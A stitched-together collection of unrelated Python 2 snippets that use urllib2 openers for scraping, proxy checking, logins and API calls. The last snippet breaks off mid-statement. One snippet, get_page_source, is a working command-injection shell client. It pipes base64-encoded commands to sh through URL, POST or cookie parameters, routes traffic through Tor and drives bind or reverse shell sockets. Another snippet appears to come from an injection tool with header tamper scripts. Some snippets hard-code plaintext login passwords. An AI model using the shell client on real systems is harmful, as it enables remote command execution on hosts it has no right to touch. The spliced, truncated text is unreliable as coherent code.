def proxier(pip): try: testsite2 = "http://%s" % (testsite) proxy_handler = urllib2.ProxyHandler({'http': pip}) opener = urllib2.build_opener(proxy_handler) opener.addheaders = [('User-agent', 'Mozilla/5.0')] urllib2.install_opener(opener) req=urllib2.Request(testsite2) sock=urllib2.urlopen(req) connect = httplib.HTTPConnection(testsite) connect.request("HEAD", "/") r1 = connect.getresponse() if r1.reason == "OK": print "%s works - Added to %s" % (pip, filename) try: file = open(filename, 'a') file.write("%s" % (pip)) file.close() except IOError: print "Could not append to file!" except urllib2.HTTPError as e: print 'Error code: ', e.code return e.code except Exception as detail: print "Error: Timeout" return False
def fetch_file(uri, file=None, username=None, password=None): """ Fetch a file based on the URI provided. If you do not pass in a file pointer a tempfile.NamedTemporaryFile, or None if the file could not be retrieved is returned. The URI can be either an HTTP url, or "s3://bucket_name/key_name" """ boto.log.info('Fetching %s' % uri) if file == None: file = tempfile.NamedTemporaryFile() try: if uri.startswith('s3://'): bucket_name, key_name = uri[len('s3://'):].split('/', 1) c = boto.connect_s3(aws_access_key_id=username, aws_secret_access_key=password) bucket = c.get_bucket(bucket_name) key = bucket.get_key(key_name) key.get_contents_to_file(file) else: if username and password: passman = urllib2.HTTPPasswordMgrWithDefaultRealm() passman.add_password(None, uri, username, password) authhandler = urllib2.HTTPBasicAuthHandler(passman) opener = urllib2.build_opener(authhandler) urllib2.install_opener(opener) s = urllib2.urlopen(uri) file.write(s.read()) file.seek(0) except: raise boto.log.exception('Problem Retrieving file: %s' % uri) file = None return file
def run(self): try: cj = cookielib.LWPCookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) urllib2.install_opener(opener) req = urllib2.Request(self.url) operate = opener.open(req) html = operate.read() print r'handling ', self.urlid m = re.findall(r'>.*?</a></b></span>', html) if len(m) != 0: file_save = open(r'F://temp/3/'+self.urlid[:-1]+'.txt','a') file_save.write('ProductId:' + self.urlid) for i in m: j = i[1:-15].split('>') file_save.write(j[-1]+'\n') file_save.close() time.sleep(0.2) except: print "no"
def findMovieReviewers(movie_id, subUrl) : print movie_id print subUrl reload(sys) sys.setdefaultencoding('utf-8') cj = cookielib.LWPCookieJar() try: cj.revert('douban.cookie') except: try : dou=douban() username='******' password='******' domain='http://www.douban.com/' origURL='http://www.douban.com/login' dou.setinfo(username,password,domain,origURL) dou.signin() except : return opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) urllib2.install_opener(opener) collectPage = urllib2.urlopen("http://movie.douban.com/subject/" + movie_id + "/reviews" + subUrl, timeout=20).read().encode('utf-8') soup = BeautifulSoup(collectPage, 'html.parser') #init db connection conn = MySQLdb.connect(host='localhost',user='******',passwd='root') curs = conn.cursor() conn.select_db('pydb') reviewsOfThisPage = soup.findAll("a", { "class" : "review-hd-avatar" }) countReviews = len(reviewsOfThisPage) print countReviews for review in reviewsOfThisPage : reviewSoup = BeautifulSoup(str(review), 'html.parser') userId = reviewSoup.a["href"].split("/")[4] try : #insert data into db rowbyrow curs.execute('INSERT INTO users (user_id) VALUES (%s)', userId) print "rows affected " + str(curs.rowcount) except : print "error inserting, probably duplicate for userid : " + userId None try : foundSubUrl = soup.find("a", { "class" : "next" })['href'] except : foundSubUrl = "" print foundSubUrl conn.commit() curs.close() conn.close() if "" != foundSubUrl and countReviews > 0 : time.sleep( 2 ) findMovieReviewers(movie_id, foundSubUrl)
def save(self): # TODO: new IP address should be added in a side-by-side manner # or the interface wouldn't appear once IP was changed. retval = super(GlobalConfigurationForm, self).save() whattoreload = "hostname" if self.instance._orig_gc_ipv4gateway != self.cleaned_data.get('gc_ipv4gateway'): whattoreload = "networkgeneral" if self.instance._orig_gc_ipv6gateway != self.cleaned_data.get('gc_ipv6gateway'): whattoreload = "networkgeneral" notifier().reload(whattoreload) http_proxy = self.cleaned_data.get('gc_httpproxy') if http_proxy: os.environ['http_proxy'] = http_proxy os.environ['https_proxy'] = http_proxy elif not http_proxy: if 'http_proxy' in os.environ: del os.environ['http_proxy'] if 'https_proxy' in os.environ: del os.environ['https_proxy'] # Reset global opener so ProxyHandler can be recalculated urllib2.install_opener(None) return retval
def __init__(self, cookie_filename=None): self.cj = cookielib.LWPCookieJar() if cookie_filename is not None: self.cj.load(cookie_filename) self.cookie_processor = urllib2.HTTPCookieProcessor(self.cj) self.opener = urllib2.build_opener(self.cookie_processor, urllib2.HTTPHandler) urllib2.install_opener(self.opener)
def query(searchstr, outformat, allresults=False): """Return a list of bibtex items.""" logging.debug("Query: %s" % searchstr) searchstr = "/scholar?q=" + urllib2.quote(searchstr) url = GOOGLE_SCHOLAR_URL + searchstr header = HEADERS header["Cookie"] = header["Cookie"] + ":CF=%d" % outformat for proxy_addr in proxy_list: try: proxy = urllib2.ProxyHandler({"http": proxy_addr}) opener = urllib2.build_opener(proxy) urllib2.install_opener(opener) request = urllib2.Request(url, headers=header) response = urllib2.urlopen(request, timeout=5) print "Success HTTP-Agent:" + proxy_addr break except urllib2.URLError, e: if hasattr(e, "code"): print str(e.code) + e.msg + proxy_addr if e.code == 403 or e.code == 503: proxy_list.remove(proxy_addr) elif e.reason.message == "timed out": print "Timed Out" + proxy_addr proxy_list.remove(proxy_addr) continue
def play_fourshared(url, name): global media_id xbmc.log("starting 4shared method with: %s and %s" % (name, url)) username = '******' password = '******' cookie_file = os.path.join(__profilepath__, 'pktemp.cookies') media_file = os.path.join(__profilepath__, ("pktemp%d.mp3" % (media_id))) cj = cookielib.LWPCookieJar() media_id = media_id + 1 opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) loginurl = 'https://www.4shared.com/login?login=%s&password=%s' % (username, password) xbmc.log("logging in to 4shared: " + loginurl) resp = opener.open(loginurl) cj.save(cookie_file, ignore_discard=True) cj.load(cookie_file, ignore_discard=True) opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) urllib2.install_opener(opener) usock = opener.open(url) data = usock.read() #media_file = usock.geturl() usock.close() fp = open(media_file, 'wb') fp.write(data) fp.close() #play_stream(media_file, name) print "playing stream name: " + str(name) + " url: " + str(media_file) listitem = xbmcgui.ListItem( label = str(name), iconImage = "DefaultVideo.png", thumbnailImage = xbmc.getInfoImage( "ListItem.Thumb" ), path=media_file ) listitem.setInfo( type="Music", infoLabels={ "Title": name } ) xbmc.Player( xbmc.PLAYER_CORE_DVDPLAYER ).play( str(media_file), listitem)
def __init__(self, username, realm_id, config, debug=False): self._version = QAPI_VERSION self._cookiejar = CookieJar() self._username = username self._realm_id = realm_id self._profile = '@'.join((username, realm_id)) self._realm = REALMS[self._realm_id] self._proxy = None self._templates = None self._debug = debug self._config = None #. User configuration file for scripted mode self._connected = False self._username = '******' self._cFM = None try: from ConfigFileManager import ConfigFileManager, InternalConfigError try: self._config = ConfigFileManager(config) self._qapi_ini = self._config.option('qapi', 'ini') self._cFM = ConfigFileManager(self._qapi_ini) except InternalConfigError as e: raise Exception("Sorry, %s" % e) except ImportError as e: raise Exception("Sorry, %s" % e) urllib2.install_opener(self._opener())
def check_proxy(self, specific={}): """ Checks if proxy settings are set on the OS Returns: -- 1 when direct connection works fine -- 2 when direct connection fails and any proxy is set in the OS -- 3 and settings when direct connection fails but a proxy is set see: https://docs.python.org/2/library/urllib.html#urllib.getproxies """ os_proxies = getproxies() if len(os_proxies) == 0 and self.check_internet_connection: logging.info("No proxy needed nor set. Direct connection works.") return 1 elif len(os_proxies) == 0 and not self.check_internet_connection: logging.error("Proxy not set in the OS. Needs to be specified") return 2 else: # env['http_proxy'] = os_proxies.get("http") env['https_proxy'] = os_proxies.get("https") # proxy = ProxyHandler({ 'http': os_proxies.get("http"), 'https': os_proxies.get("https") }) opener = build_opener(proxy) install_opener(opener) urlopen('http://www.google.com') return 3, os_proxies
def openurl(self,url): """ 打开网页 """ cookie_support= urllib2.HTTPCookieProcessor(cookielib.CookieJar()) self.opener = urllib2.build_opener(cookie_support, urllib2.HTTPHandler) urllib2.install_opener(self.opener) user_agents = [ 'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11', 'Opera/9.25 (Windows NT 5.1; U; en)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.12) Gecko/20070731 Ubuntu/dapper-security Firefox/1.5.0.12', 'Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/1.2.9', "Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.7 (KHTML, like Gecko) Ubuntu/11.04 Chromium/16.0.912.77 Chrome/16.0.912.77 Safari/535.7", "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:10.0) Gecko/20100101 Firefox/10.0 ", ] agent = random.choice(user_agents) self.opener.addheaders = [("User-agent",agent), ("Accept","*/*"), ('Referer', 'http://www.google.com') ] try: res = self.opener.open(url) return res.read() except: return None
def Weibo(USERID, PASSWD): client = APIClient(app_key=APP_KEY, app_secret=APP_SECRET, redirect_uri=CALLBACK_URL) referer_url = client.get_authorize_url() #print "referer url is : %s" % referer_url cookies = urllib2.HTTPCookieProcessor() opener = urllib2.build_opener(cookies) urllib2.install_opener(opener) postdata = {"client_id": APP_KEY, "redirect_uri": CALLBACK_URL, "userId": USERID, "passwd": PASSWD, "isLoginSina": "0", "action": "submit", "response_type": "code", } headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0", "Host": "api.weibo.com", "Referer": referer_url } req = urllib2.Request(url = AUTH_URL, data = urllib.urlencode(postdata), headers = headers ) try: resp = urllib2.urlopen(req) #print "callback url is : %s" % resp.geturl() code = resp.geturl()[-32:] except APIError, e: print e
def _login(self): """ Authenticates a user in a bugzilla tracker """ if not (self.backend_user and self.backend_password): printdbg("No account data provided. Not logged in bugzilla") return import cookielib cookie_j = cookielib.CookieJar() cookie_h = urllib2.HTTPCookieProcessor(cookie_j) url = self._get_login_url(self.url) values = {'Bugzilla_login': self.backend_user, 'Bugzilla_password': self.backend_password} opener = urllib2.build_opener(cookie_h) urllib2.install_opener(opener) data = urllib.urlencode(values) request = urllib2.Request(url, data) urllib2.urlopen(request) for i, c in enumerate(cookie_j): self.cookies[c.name] = c.value printout("Logged in bugzilla as %s" % self.backend_user) printdbg("Bugzilla session cookies: %s" % self.cookies)
def getResponseMixedData(self, url, secureToken, dic, additionalOptions=None): "Method sets up a REST call with mixed body data such as multipart/form-data." # check whether proxy is given if "proxy" in globals(): proxy_handler = urllib2.ProxyHandler(self.config.proxy) opener = urllib2.build_opener(proxy_handler) urllib2.install_opener(opener) multipart = urllib2.build_opener(MultipartPostHandler.MultipartPostHandler) urllib2.install_opener(multipart) req = urllib2.Request(url, dic.parameters()) req.add_header('Authorization', self.config.SDK_AUTH+",oauth_token=\""+secureToken+"\"") req.add_header('User-Agent', self.config.SDK_VERSION) req.add_header('Accept', 'application/json') # sets additional header fields if additionalOptions != None: for key in additionalOptions: req.add_header(key, additionalOptions[key]) try: response = urllib2.urlopen(req) response = json.loads(response.read()) return response except urllib2.HTTPError as e: raise TelekomException(json.loads(e.read()))
def getResponseJSONData(self, url, secureToken, jsonString, additionalOptions=None): "Method sends a JSON encoded string via REST" if "proxy" in globals(): # set proxy if necessary proxy_handler = urllib2.ProxyHandler(self.config.proxy) opener = urllib2.build_opener(proxy_handler) urllib2.install_opener(opener) req = urllib2.Request(url, jsonString) # define header fields req.add_header('Authorization', self.config.SDK_AUTH+",oauth_token=\""+secureToken+"\"") req.add_header('User-Agent', self.config.SDK_VERSION) req.add_header('Accept', 'application/json') req.add_header('Content-Type', 'application/json') #req.add_header('Content-Length', len(json)) # establish call try: response = urllib2.urlopen(req) response = json.loads(response.read()) return response except urllib2.HTTPError as e: # catch other status codes than '0000' and raise a new TelekomException containing 'statusCode' and 'statusMessage' raise TelekomException(json.loads(e.read()))
def setCookie(self, account = ''): self.cookieJarInMemory = cookielib.LWPCookieJar() if account == '': Var = self.cursor.execute("select cookieStr, recordDate from LoginRecord order by recordDate desc").fetchone() else: Var = self.cursor.execute("select cookieStr, recordDate from LoginRecord order by recordDate desc where account = `{}`".format(account)).fetchone() cookieStr = Var[0] self.loadCookJar(cookieStr) cookieStr = '' for cookie in self.cookieJarInMemory: cookieStr += cookie.name + '=' + cookie.value + ';' self.extraHeader = { 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:34.0) Gecko/20100101 Firefox/34.0', 'Referer': 'www.zhihu.com/', 'Host': 'www.zhihu.com', 'DNT': '1', 'Connection': 'keep-alive', 'Cache-Control': 'max-age=0', 'Accept-Language': 'zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3', # 'Accept-Encoding': 'gzip, deflate', 貌似没用 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', } self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookieJarInMemory)) urllib2.install_opener(self.opener) return
def run(self): global proxyLists global proxyCheckedLists while proxyLists: proxyLock.acquire() #获取锁 proxyList = proxyLists.pop() #推出一个代理ip信息 proxyLock.release() cookie = urllib2.HTTPCookieProcessor() #使用cookie proxyHandle = urllib2.ProxyHandler({"http" : r"http://%s:%s" % (proxyList[0], proxyList[1])}) opener = urllib2.build_opener(cookie, proxyHandle) opener.addheaders = [("User-Agent", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.102 Safari/537.36")] urllib2.install_opener(opener) t1 = time.time() try: req = urllib2.urlopen(self.test_url, timeout=self.timeout) result = req.read() pos = result.find(self.test_str) timeused = time.time() - t1 proxyList.append(timeused) if pos > 1: proxyLock.acquire() proxyCheckedLists.append(proxyList) proxyLock.release() except Exception,e: continue
def __init__(self, ticker_list, proxy=None): if proxy: proxy_support = urllib2.ProxyHandler(proxy) opener = urllib2.build_opener(proxy_support) urllib2.install_opener(opener) tickers = '%22%2C%22'.join(ticker_list).upper() url = 'http://query.yahooapis.com/v1/public/yql?q=select%20*%20from%20yahoo.finance.quotes%20where%20symbol%20in%20(%22'+tickers+'%22)&format=json&env=store%3A%2F%2Fdatatables.org%2Falltableswithkeys&callback=' req = urllib2.Request(url) try: response = urllib2.urlopen(req) except urllib2.URLError, e: if hasattr(e, 'reason'): print 'We failed to reach a server with reason:', e.reason print 'The URL passed was:', url print 'The tickers passed were:', tickers print 'The response from Yahoo was:', e.read() print elif hasattr(e, 'code'): print 'The server couldn\'t fulfill the request with error code:', e.code print 'The URL passed was:', url print 'The tickers passed were:', tickers print 'The response from Yahoo was:', e.read() print
def __init__(self): self.cj = cookielib.CookieJar() self.handlers = [poster.streaminghttp.StreamingHTTPHandler(), poster.streaminghttp.StreamingHTTPRedirectHandler(), urllib2.HTTPCookieProcessor(self.cj)] self.opener = urllib2.build_opener(*self.handlers) urllib2.install_opener(self.opener)
def urlcontent(self, url, para=None, header={}): """ 获取地址的源代码 url 要获取的网址 header 头部设置 """ print "start get url:%s" % url if self.auto_sleep: sleep_time = random.random()*2 time.sleep(sleep_time) #设置代理 只设置http和https代理 if self.proxy: opener = urllib2.build_opener(urllib2.ProxyHandler({'http': self.proxy, 'https' : self.proxy}) ) urllib2.install_opener(opener) #设置post参数 params = None if para: params = urllib.urlencode(para) #创建请求 request = urllib2.Request(url, params, header) try: #发送请求 response = urllib2.urlopen(request) content = response.read() #设置了编码 if self.charset: content = content.encode(self.charset) return content except: print 'get url content failed:', url return None
def loginWillowTV(url): try: print url opener = urllib2.build_opener(cookiejar) urllib2.install_opener(opener) email = wtv.getSetting('email') pwd = wtv.getSetting('password') values = {'Email': email,'Password': pwd, 'KeepSigned': 'true', 'LoginFormSubmit': 'true'} headers = { 'User-Agent' : 'Mozilla/5.0 (iPad; CPU OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3' } data = urllib.urlencode(values) req = urllib2.Request(url, data, headers) response = urllib2.urlopen(req) link=response.read() response.close() web = ''.join(link.splitlines()).replace('\t','').replace('\'','"') match=re.compile('Your email or password is incorrect').findall(web) if(len(match)>0): d = xbmcgui.Dialog() d.ok('Login Failed', 'Error: Your email or password is incorrect.','Please verify your login details.') return False else: loginSuccess = True return True except: d = xbmcgui.Dialog() d.ok('LOGIN Failed', 'Its not your fault. BREAK TIME!','Please go out of Willow TV and try again.') return False
def fx_opener(request): request.addfinalizer( functools.partial(setattr, urllib2, '_opener', urllib2._opener) ) opener = urllib2.build_opener(TestHTTPHandler) urllib2.install_opener(opener) return opener
def _opener(self): build = [urllib2.HTTPHandler()] if self.request.redirect: build.append(urllib2.HTTPRedirectHandler()) if self.request.proxy_host and self.request.proxy_port: build.append(urllib2.ProxyHandler( {self.request.proxy_protocol: self.request.proxy_host + ':' + str(self.request.proxy_port)})) if self.request.proxy_username: proxy_auth_handler = urllib2.ProxyBasicAuthHandler() proxy_auth_handler.add_password('realm', 'uri', self.request.proxy_username, self.request.proxy_password) build.append(proxy_auth_handler) if self.request.cookies: self.request.cookies = os.path.join(self._dirname, self.request.cookies) self.cookies = cookielib.MozillaCookieJar() if os.path.isfile(self.request.cookies): self.cookies.load(self.request.cookies) build.append(urllib2.HTTPCookieProcessor(self.cookies)) urllib2.install_opener(urllib2.build_opener(*build))
def fetch_data_from_url(url): """Downloads and returns data from a url""" request = urllib2.Request(url) opener = urllib2.build_opener() urllib2.install_opener(opener) data = opener.open(request).read() return data
def _connect(self, request): """ Connect to the secured database by opening the request. Required: urllib2.Request request The URL Request. Return: str serialized_response response data """ # create a password manager password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm() # Add the username and password. # If we knew the realm, we could use it instead of None. password_mgr.add_password( None, self.base_url(), self._username, self._password) handler = urllib2.HTTPBasicAuthHandler(password_mgr) # create "opener" (OpenerDirector instance) opener = urllib2.build_opener(handler) # Install the opener. # Now all calls to urllib2.urlopen use our opener. urllib2.install_opener(opener) serialized_response = urllib2.urlopen(request).read() return serialized_response
def login_website(): '''51cto''' proxy_support = urllib2.ProxyHandler({'http':'127.0.0.1:8086'}) cook_jar=cookielib.CookieJar() cookie_support=urllib2.HTTPCookieProcessor(cook_jar) opener=urllib2.build_opener(proxy_support,cookie_support,urllib2.HTTPHandler) urllib2.install_opener(opener) print 'logging' login_url='http://home.51cto.com/index.php?s=/Index/doLogin' user_agents = ['Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1',] post_data=urllib.urlencode({'email':'*****@*****.**', 'passwd':'123456a', 'autologin':'******', 'reback':'http%3A%2F%2Fwww.51cto.com%2F', 'button.x':36, 'button.y':17, }) headers={ 'User-Agent':user_agents[0], 'Referer':'http://home.51cto.com/index.php?s=/Index/index/reback/http%253A%252F%252Fwww.51cto.com%252F/' } req=urllib2.Request(url=login_url,data=post_data,headers=headers) res = urllib2.urlopen(req) print 'code is :'+str(res.code) if res.code<=200: print 'login success' else: print 'login fail' print cook_jar._cookies login_after_action(res) return res
def login_website(): '''csdn''' cook_jar=cookielib.CookieJar() cookie_support=urllib2.HTTPCookieProcessor(cook_jar) opener=urllib2.build_opener(cookie_support,urllib2.HTTPHandler) urllib2.install_opener(opener) print 'logging' login_url='http://passport.csdn.net/ajax/accounthandler.ashx?t=log&u=dylinshi&p=123456a&remember=0&f=http%3A%2F%2Fblog.csdn.net%2F&rand=0.363029723724382' user_agents = [ 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6', 'Opera/9.25 (Windows NT 5.1; U; en)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.12) Gecko/20070731 Ubuntu/dapper-security Firefox/1.5.0.12', 'Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/1.2.9' ] headers={ 'User-Agent':user_agents[0], 'Referer':settings.S_start_urls[0] } req=urllib2.Request(url=login_url,headers=headers) res = urllib2.urlopen(req) print 'code is :'+str(res.code) if res.code<=200: print 'login %s success'%settings.S_target_website else: print 'login %s fail'%settings.S_target_website print cook_jar._cookies return res
def __init__(self, login, password, hostname, port=8091): self.passman = urllib2.HTTPPasswordMgrWithDefaultRealm() self.passman.add_password(None, "http://%s:%d/" % (hostname, int(port)), login, password) self.hostname = hostname self.port = port self.opener = urllib2.build_opener(urllib2.HTTPBasicAuthHandler(self.passman)) urllib2.install_opener(self.opener)
def get_current_sequence(self): """get the current sequence from the paylist""" url = self.get_sequence_url() header = self.get_header() req = urllib2.Request(url, None, header) opener = urllib2.build_opener() opener.add_handler(urllib2.HTTPCookieProcessor(self.get_cookie())) try: opener.add_handler(self.get_proxy()) except: log.warning('can not add proxy') urllib2.install_opener(opener) try: response = urllib2.urlopen(req, timeout=10) stream = response.read() except: return 0 try: for line in stream.split('\n'): if line.startswith('#EXT-X-MEDIA-SEQUENCE'): return line.split(':')[1] except: return 0
def __init__(self, url, close=True, proxy=None, post=None, mobile=False, referer=None, cookie=None, output='', timeout='10'): if not proxy is None: proxy_handler = urllib2.ProxyHandler({'http':'%s' % (proxy)}) opener = urllib2.build_opener(proxy_handler, urllib2.HTTPHandler) opener = urllib2.install_opener(opener) if output == 'cookie' or not close == True: import cookielib cookie_handler = urllib2.HTTPCookieProcessor(cookielib.LWPCookieJar()) opener = urllib2.build_opener(cookie_handler, urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler()) opener = urllib2.install_opener(opener) if not post is None: request = urllib2.Request(url, post) else: request = urllib2.Request(url,None) if mobile == True: request.add_header('User-Agent', 'Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A293 Safari/6531.22.7') else: request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0') if not referer is None: request.add_header('Referer', referer) if not cookie is None: request.add_header('cookie', cookie) response = urllib2.urlopen(request, timeout=int(timeout)) if output == 'cookie': result = str(response.headers.get('Set-Cookie')) elif output == 'geturl': result = response.geturl() else: result = response.read() if close == True: response.close() self.result = result
def get_page_source(self, cmd): self.cmd = cmd if self.shouldIuseB64: self.cmd = "echo %s | base64 -d | sh" % self.cmd.encode( 'base64').replace('\n', '') result = re.search(';sudo ', self.cmd) if result: command = self.cmd.replace( 'sudo', '{0}sudo{1}'.format('\033[91m', '\033[93m')) errmsg = colored( '\n[!] Warning this command ({0}) could break the connection. I\'m not going to allow it to be sent' .format(command), 'red') cprint(errmsg, 'red') elif getargs.url: try: _create_unverified_https_context = ssl._create_unverified_context except AttributeError: # Legacy Python that doesn't verify HTTPS certificates by default pass else: # Handle target environment that doesn't support HTTPS verification ssl._create_default_https_context = _create_unverified_https_context # Proxy support proxy_support = ProxyHandler( {'http': self.proxy} if self.proxy else {}) opener = build_opener(proxy_support, HTTPHandler(debuglevel=0)) opener.addheaders = [ ('Accept', '*/*'), ] if getargs.headers: # print opener.addheaders # print getargs.headers opener.addheaders.extend(getargs.headers) # Tor support if self.tor: opener = build_opener( SocksiPyHandler(PROXY_TYPE_SOCKS5, '127.0.0.1', 9050)) # print opener.open('http://ifconfig.me/ip').read() # exit() # User angent if getargs.random_agent: opener.addheaders.extend([('User-agent', self.random_agent)]) elif self.user_agent: opener.addheaders.extend([('User-agent', self.user_agent)]) else: pass install_opener(opener) errmsg = colored( '\n[!] Check your network connection and/or the proxy (if you\'re using one)', 'red') # Check if the method is POST if self.method == 'post' or (self.parameter and self.method != 'cookie'): self.method = 'post' parameters = urlencode({ self.parameter: 'echo ::command_start::;' + self.cmd.strip(';') + ';echo ::command_end::;' }) try: sc = map(str.rstrip, opener.open(self.url, parameters).readlines()) sc = '::command_deli::'.join(sc) sc = re.search('::command_start::(.*?)::command_end::', sc) if sc: sc = sc.group(1).split('::command_deli::')[1:-1] else: parameters = urlencode( {self.parameter: self.cmd.strip(';')}) sc = map(str.rstrip, opener.open(self.url, parameters).readlines()) return sc except InvalidURL: exit(errmsg) # except: # exit(fourzerofourmsg) # If the used method set GET else: try: if self.method == 'cookie': opener.addheaders += [ ('Cookie', '{0}={1}'.format( self.parameter, quote('echo ::command_start::;' + self.cmd.rstrip().strip(';') + ';echo ::command_end::;'))), ] sc = map(str.rstrip, opener.open(self.url).readlines()) else: sc = map( str.rstrip, opener.open('{0}{1}'.format( self.url, quote('echo ::command_start::;' + self.cmd.strip(';') + ';echo ::command_end::;'))).readlines()) sc = '::command_deli::'.join(sc) sc = re.search('::command_start::(.*?)::command_end::', sc) if sc: sc = sc.group(1).split('::command_deli::')[1:-1] else: sc = map( str.rstrip, opener.open('{0}{1}'.format( self.url, quote(self.cmd.strip(';')))).readlines()) return sc except InvalidURL: exit(errmsg) except HTTPError: cprint( '[!] This is a 414 error code and you need to work with a POST method', 'red') exit() elif getargs.listen: try: if (listen.socket.sendall(cmd + "\n") != None): errmsg = colored('\n[!] Error in sending data (#1)', 'red') cprint(errmsg, 'red') time.sleep(1) sc = '' buffer = listen.socket.recv(1024) if buffer == '': errmsg = colored('\n[!] Lost connection. Exiting...', 'red') cprint(errmsg, 'red') listen.socket.close() exit(1) while buffer != '': sc = sc + buffer # sc +=+ buffer # convert " to ' try: buffer = listen.socket.recv(1024) except: buffer = '' sc = [ i for i in sc.split('\n')[:-1] if not any(s in i for s in [ 'job control in this shell', 'cannot set terminal process group', 'can\'t access tty', '<' ]) ] return sc except: if (listen.socket.sendall(cmd + "\n") != None): errmsg = colored('\n[!] [!] Error in sending data (#2)', 'red') cprint(errmsg, 'red') pass elif getargs.connect: try: if (connect.socket.send(cmd + "\n") == None): errmsg = colored('\n[!] Error in sending data (#1)', 'red') cprint(errmsg, 'red') time.sleep(1) sc = '' buffer = connect.socket.recv(1024) if buffer == '': errmsg = colored('\n[!] Lost connection. Exiting...', 'red') cprint(errmsg, 'red') connect.socket.close() exit(1) while buffer != '': sc = sc + buffer try: buffer = connect.socket.recv(1024) except: buffer = '' return sc.split('\n')[:-1] except: pass else: errmsg = colored('\n[!] Unsupported mode!', 'red') cprint(errmsg, 'red') exit(1)
@param proxy: The HTTP proxy server to use. For example: 'http://proxy.example.com:3128/' @param user: The username to authenticate with. Use C{None} to disable authentication. @param password: The password to authenticate with. """ import urllib import urllib2 if proxy is None: # Try and find the system proxy settings try: proxy = urllib.getproxies()['http'] except KeyError: raise ValueError('Could not detect default proxy settings') # Set up the proxy handler proxy_handler = urllib2.ProxyHandler({'http': proxy}) opener = urllib2.build_opener(proxy_handler) if user is not None: # Set up basic proxy authentication if provided password_manager = urllib2.HTTPPasswordMgrWithDefaultRealm() password_manager.add_password(realm=None, uri=proxy, user=user, passwd=password) opener.add_handler(urllib2.ProxyBasicAuthHandler(password_manager)) opener.add_handler(urllib2.ProxyDigestAuthHandler(password_manager)) # Overide the existing url opener urllib2.install_opener(opener)
def do_check(request): # Check if defined any Host HTTP header. if menu.options.host and settings.HOST_INJECTION == None: request.add_header(settings.HOST, menu.options.host) # Check if defined any User-Agent HTTP header. if menu.options.agent: request.add_header(settings.USER_AGENT, menu.options.agent) # Check if defined any Referer HTTP header. if menu.options.referer and settings.REFERER_INJECTION == None: request.add_header(settings.REFERER, menu.options.referer) # Check if defined any Cookie HTTP header. if menu.options.cookie and settings.COOKIE_INJECTION == False: request.add_header(settings.COOKIE, menu.options.cookie) if not checks.get_header(request.headers, settings.HTTP_ACCEPT_HEADER): request.add_header(settings.HTTP_ACCEPT_HEADER, settings.HTTP_ACCEPT_HEADER_VALUE) # Appends a fake HTTP header 'X-Forwarded-For' if settings.TAMPER_SCRIPTS["xforwardedfor"]: from src.core.tamper import xforwardedfor xforwardedfor.tamper(request) # Check if defined any HTTP Authentication credentials. # HTTP Authentication: Basic / Digest Access Authentication. if not menu.options.ignore_401: if menu.options.auth_cred and menu.options.auth_type: try: settings.SUPPORTED_HTTP_AUTH_TYPES.index( menu.options.auth_type) if menu.options.auth_type == "basic": b64_string = base64.encodestring( menu.options.auth_cred).replace('\n', '') request.add_header("Authorization", "Basic " + b64_string + "") elif menu.options.auth_type == "digest": try: url = menu.options.url try: response = urllib2.urlopen(url) except urllib2.HTTPError, e: try: authline = e.headers.get( 'www-authenticate', '') authobj = re.match('''(\w*)\s+realm=(.*),''', authline).groups() realm = authobj[1].split(',')[0].replace( "\"", "") user_pass_pair = menu.options.auth_cred.split( ":") username = user_pass_pair[0] password = user_pass_pair[1] authhandler = urllib2.HTTPDigestAuthHandler() authhandler.add_password( realm, url, username, password) opener = urllib2.build_opener(authhandler) urllib2.install_opener(opener) result = urllib2.urlopen(url) except AttributeError: pass except urllib2.HTTPError, e: pass except ValueError: err_msg = "Unsupported / Invalid HTTP authentication type '" + menu.options.auth_type + "'." err_msg += " Try basic or digest HTTP authentication type." print settings.print_critical_msg(err_msg) raise SystemExit() else: pass # The MIME media type for JSON. if settings.IS_JSON: request.add_header("Content-Type", "application/json") # Check if defined any extra HTTP headers. if menu.options.headers or menu.options.header: # Do replacement with the 'INJECT_HERE' tag, if the wildcard char is provided. if menu.options.headers: menu.options.headers = checks.wildcard_character( menu.options.headers) extra_headers = menu.options.headers else: menu.options.header = 